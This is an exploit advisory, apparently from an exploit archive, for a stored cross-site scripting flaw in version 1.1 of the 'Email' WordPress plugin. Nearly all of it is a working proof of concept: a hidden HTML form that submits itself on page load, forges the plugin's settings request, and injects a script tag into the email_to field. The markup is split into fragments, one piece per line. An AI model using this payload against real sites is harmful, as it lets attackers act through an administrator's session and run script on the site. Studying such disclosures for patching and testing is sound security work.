######################
# Exploit Title : Wordpress Email 1.1 Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : https://wordpress.org/plugins/email/
# Software Link : https://downloads.wordpress.org/plugin/email.1.1.zip
# Date : 2015-01-03
# Tested on : Windows 7 / Mozilla Firefox
######################
######################
# Vulnerable code :
<
tr
valign
=
"top"
>
<
th
scope
=
"row"
><
label
for="<?php echo $email_fromPname;
?>">From</
label
></
th
>
<
td
>
<
input
type
=
"text"
id="<?php echo $email_from_name; ?>"
name="<?
php
echo $email_from_name; ?>" style="width: 25%"
value="<?
php
echo get_bloginfo( 'site_name' ); ?>" placeholder="The name in the From
field">
<
input
type
=
"text"
id="<?php echo $email_from; ?>" name="<?
php
echo $email_from;
?>"
style="width: 25%" value=/><
script
>alert(123)</
script
> placeholder="The email address to
send from">
</
td
>
</
tr
>
#####################
Exploit Code:
<
html
>
<
body
>
<
style
>
#test{
display:none;
}
</
style
>
<
form
name
=
"send"
method
=
"post"
<
div
id
=
"test"
>
<
table
class
=
"form-table"
>
<
tbody
>
<
tr
valign
=
"top"
>
<
select
id
=
"email_type"
name
=
"email_type"
>
<
option
val
=
"post"
>post</
option
>
</
select
>
</
td
>
</
tr
>
<
td
>
<
select
id
=
"email_action"
name
=
"email_action"
>
<
option
val
=
"0"
>new</
option
>
</
select
>
</
td
>
</
tr
>
<
td
>
<
input
id
=
"email_from_name"
type
=
"hidden"
name
=
"email_from_name"
style
=
"width: 25%"
value
=
"wordpress"
placeholder="The name in
the From field">
<
input
id
=
"email_from"
type
=
"hidden"
name
=
"email_from"
style
=
"width: 25%"
value
=
"1@1.com"
placeholder
=
"The email address to send from"
>
</
td
>
</
tr
>
<
td
>
<
select
id
=
"email_to_role"
name
=
"email_to_role"
class
=
"chosen-select select-role"
data-placeholder
=
"Choose a role (optional)"
style="width:
25%">
<
option
></
option
>
</
select
>
<
input
id
=
"email_to"
name
=
"email_to"
value='"><
script
>alert(1)</
script
>' style="width: 70%" placeholder="Additional email
addresses">
</
td
>
</
tr
>
<
td
>
<
select
id
=
"email_cc_role"
name
=
"email_cc_role"
class
=
"chosen-select select-role"
data-placeholder
=
"Choose a role (optional)"
style="width:
25%">
<
option
></
option
>
</
select
>
<
input
type
=
"hidden"
id
=
"email_cc"
name
=
"email_cc"
style
=
"width: 70%"
placeholder
=
"Additional email addresses"
>
</
td
>
</
tr
>
<
td
>
<
select
id
=
"email_bcc_role"
name
=
"email_bcc_role"
class
=
"chosen-select select-role"
data-placeholder
=
"Choose a role (optional)"
style="width:
25%">
<
option
></
option
>
</
select
>
<
input
type
=
"hidden"
id
=
"email_bcc"
name
=
"email_bcc"
style
=
"width: 70%"
placeholder
=
"Additional email addresses"
>
</
td
>
</
tr
>
<
td
>
<
input
type
=
"hidden"
name
=
"email_subject"
style="width:
50%"
value
=
"[[site_name]] [post_title] [action]"
> Example: "[My Site] Hello World! updated"
</
td
>
</
tr
>
<
td
>
<
div
id
=
"wp-email_message-wrap"
class="wp-core-ui wp-editor-wrap
html-active"><
link
rel
=
'stylesheet'
id
=
'editor-buttons-css'
href
=
'http://localhost/wordpress/wp-includes/css/editor.min.css?ver=4.0'
type
=
"hidden"
media
=
'all'
/>
<
div
id
=
"wp-email_message-editor-container"
class
=
"wp-editor-container"
><
textarea
class
=
"wp-editor-area"
rows
=
"20"
cols
=
"40"
name
=
"email_message"
id
=
"email_message"
>1</
textarea
></
div
>
</
div
>
</
td
>
</
tr
>
<
td
>
<
input
type
=
"hidden"
name
=
"email_hidden"
value
=
"Y"
>
</
td
>
</
tr
>
</
form
>
</
div
>
<
script
language
=
"Javascript"
>
setTimeout('send.submit()', 1);
</
script
>
</
form
>
</
body
>
</
html
>